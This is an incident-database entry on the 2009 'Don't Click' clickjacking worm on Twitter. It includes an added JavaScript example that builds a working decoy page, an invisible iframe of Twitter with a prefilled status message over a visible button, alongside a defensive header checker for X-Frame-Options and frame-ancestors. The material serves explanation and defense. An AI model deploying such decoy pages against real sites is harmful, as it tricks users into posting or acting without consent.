WHID 2009-31: Double Clickjacking Worm on Twitter

Twitter is certainly overtaking Facebook as the most popular site out there, at least when it comes to security incidents. This time somebody decided to abuse Twitter to demonstrate clickjacking, the attack that RSnake and Jeremiah Grossman re-christened at the OWASP AppSec conference in New York in September 2008.

A well-placed button labeled "Don't Click" got people to click it, and the click actually sent a Twitter message: the real Twitter page was loaded in an invisible frame laid over the decoy button, so the click landed on Twitter's own update control instead. Sunlight Labs published a very interesting report showing the worm's rate of propagation.

CNET reports that the worm spread on February 12th in two pulses: after Twitter closed the loophole the first time, somebody bypassed the fix and restarted the worm.
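The mechanism described above, and the check a defender would run against it, as an added example that is not code from the WHID entry, from Shiflett's analysis, or from Twitter. `buildDecoyPage` reproduces the clickjacking layout (a transparent iframe of the target positioned over a visible "Don't Click" button), and `isFrameableBy` inspects a page's response headers to decide whether a third-party origin is allowed to frame it at all, which is the precondition every clickjacking page relies on. The `?status=` prefill in the sample URL, the origins and the header values are constructed for the example; the controls themselves (`X-Frame-Options`, CSP `frame-ancestors`) are real browser mechanisms that largely post-date this incident.

```javascript
// Added example, not code from the WHID entry, Shiflett's analysis, or Twitter.
// Sample URLs, origins and headers below are constructed for illustration.

// Attacker side: the decoy page. The visible button sits under a transparent
// iframe of the target, so a click on "Don't Click" is delivered to whatever
// control the target renders at that spot. The ?status= prefill on the target
// URL is an assumption used to show how a message can be staged in advance.
function buildDecoyPage(targetUrl, decoyLabel) {
  return `<!doctype html>
<html><body>
<button style="position:absolute;left:120px;top:80px">${decoyLabel}</button>
<iframe src="${targetUrl}" scrolling="no"
        style="position:absolute;left:0;top:0;width:800px;height:600px;
               opacity:0;z-index:2;border:0"></iframe>
</body></html>`;
}

// Defender side: decide from a response's headers whether framingOrigin may
// embed a page served from targetOrigin. Clickjacking only works when the
// answer is "yes". Handles the keyword sources and exact origins; full CSP
// source matching (schemes, wildcards, paths) is intentionally not modelled.
function isFrameableBy(headers, targetOrigin, framingOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value);
  }

  // A frame-ancestors directive, when present, takes precedence over X-Frame-Options.
  const csp = h['content-security-policy'] || '';
  const directive = csp
    .split(';')
    .map(s => s.trim())
    .find(s => /^frame-ancestors(\s|$)/i.test(s));
  if (directive) {
    const sources = directive
      .split(/\s+/)
      .slice(1)
      .map(s => s.replace(/^'|'$/g, '').toLowerCase());
    if (sources.includes('none')) return false;
    if (sources.includes('*')) return true;
    if (sources.includes('self') && framingOrigin === targetOrigin) return true;
    return sources.includes(framingOrigin.toLowerCase());
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framingOrigin === targetOrigin;

  // No framing restriction at all: the state a clickjacking page relies on.
  return true;
}

// Stand-alone run: print the decoy page and the verdict with and without a header.
const target = 'https://twitter.com/home?status=Don%27t%20Click%3A%20http%3A%2F%2Fexample.invalid';
console.log(buildDecoyPage(target, "Don't Click"));
console.log('frameable with no headers:',
  isFrameableBy({}, 'https://twitter.com', 'https://attacker.invalid'));
console.log('frameable with DENY:',
  isFrameableBy({ 'X-Frame-Options': 'DENY' }, 'https://twitter.com', 'https://attacker.invalid'));
```

The other common response is an in-page frame-busting script of the form `if (top !== self) top.location = self.location;`. Such scripts are known to be bypassable, which is one reason to prefer the header-based controls checked above; the page's own account of a fix that was circumvented the same day is a reminder that a client-side patch alone is a thin defense.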

Chris Shiflett provides a very good technical analysis of the worm.

Attack Method: Clickjacking
Incident Outcome: